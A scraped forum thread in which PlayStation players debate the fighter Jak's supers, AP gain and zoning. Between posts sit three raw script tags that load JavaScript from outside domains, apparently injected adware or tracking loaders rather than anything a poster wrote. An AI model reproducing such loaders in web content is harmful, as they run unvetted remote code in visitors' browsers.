Gaming Beast
2167 posts

Re: Jak

Dec 16, 2012

Heisenberg_35_56 wrote:

I totally agree, Jak's my main and he really does have a move for every situation hes in. Once you get him down he can definitely be an unstoppable force, his level 1 is pretty good and his level 3 is awesome. I wish his level 2 had toro's blast radius but until it does I never use it cause it's so avoidable. I barely see any Jak's online which makes maining him even more fun

IDK about his level 2. I was playing against a Jak the other day who would use it every time he got me with a hard knockdown in the corner. I don't know if it was because of our connection, but it seemed to cover all of my get-up options.

The Fro never sleeps.png

<script type="text/javascript" src="https://loading-resource.com/data.js.php?i={5B0E559A-F075-4C48-91F1-A12AED5BE78E}&d=2012-6-10&s=http://community.us.playstation.com/t5/forums/replypage/board-id/24861/message-id/338362"></script>
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
<script type="text/javascript" src="http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js"></script>
Message 11 of 16 (202 Views)
0 Likes
Sackboy
497 posts

Dec 16, 2012

I would like to use Jak more often, he is a fun character, but his AP gain is so **bleep** slow. Its honestly the only thing that doesnt make me use him as much as I want to

And I agree with a previous post here about never using his LV 2, always go with the LV1 or save up for a 3 lol

photo Deadpool_zpsa17e78d8.gif
Message 12 of 16 (194 Views)
0 Likes
Wastelander
721 posts

Dec 17, 2012
@ ken
What's your psn
Message 13 of 16 (183 Views)
0 Likes
Wastelander
721 posts

Dec 17, 2012
And yeah jak has a slow ap build but that's why he has a nice square combo. (If timed properly). It builds up ap pretty well
Message 14 of 16 (182 Views)
0 Likes
First Son
9 posts

Apr 28, 2014

I don't think you'll find that Jak is a very fun character to play. He still factually gets shut down by spammable moves, he still factually gets outzoned by anyone in the game with further projectile than his, Jak is still actually the only zoner in the game who wouldn't give a Dante as many problems as other zoners and is not considered a hard CP for Dante at all, since Jak's zoning has always been the worst in the game. You can't even argue this, because his zoning didn't get any big buffs at all. Plus, ItWhiffed seems to be one of the only Dante players who plays the MU better & properly than most. My point is that even if he's proven to be (low) high tier in the future, it's STILL too early to make the claim NOW. New tech is still being found for others and players have not adjusted to the new changes in full. So until more time has passed, all tier list will have their stronger inconsistencies (since all tier list are considered not accurate anyway in general).

Dark Satellite on Make A Gif
make animated gifs like this at MakeAGif
Message 15 of 16 (127 Views)
Wastelander
601 posts

Apr 28, 2014

LightSage- wrote:

I don't think you'll find that Jak is a very fun character to play. He still factually gets shut down by spammable moves, he still factually gets outzoned by anyone in the game with further projectile than his, Jak is still actually the only zoner in the game who wouldn't give a Dante as many problems as other zoners and is not considered a hard CP for Dante at all, since Jak's zoning has always been the worst in the game. You can't even argue this, because his zoning didn't get any big buffs at all. Plus, ItWhiffed seems to be one of the only Dante players who plays the MU better & properly than most. My point is that even if he's proven to be (low) high tier in the future, it's STILL too early to make the claim NOW. New tech is still being found for others and players have not adjusted to the new changes in full. So until more time has passed, all tier list will have their stronger inconsistencies (since all tier list are considered not accurate anyway in general).

Not the real BlueDiamond. Pass. 

Message 16 of 16 (124 Views)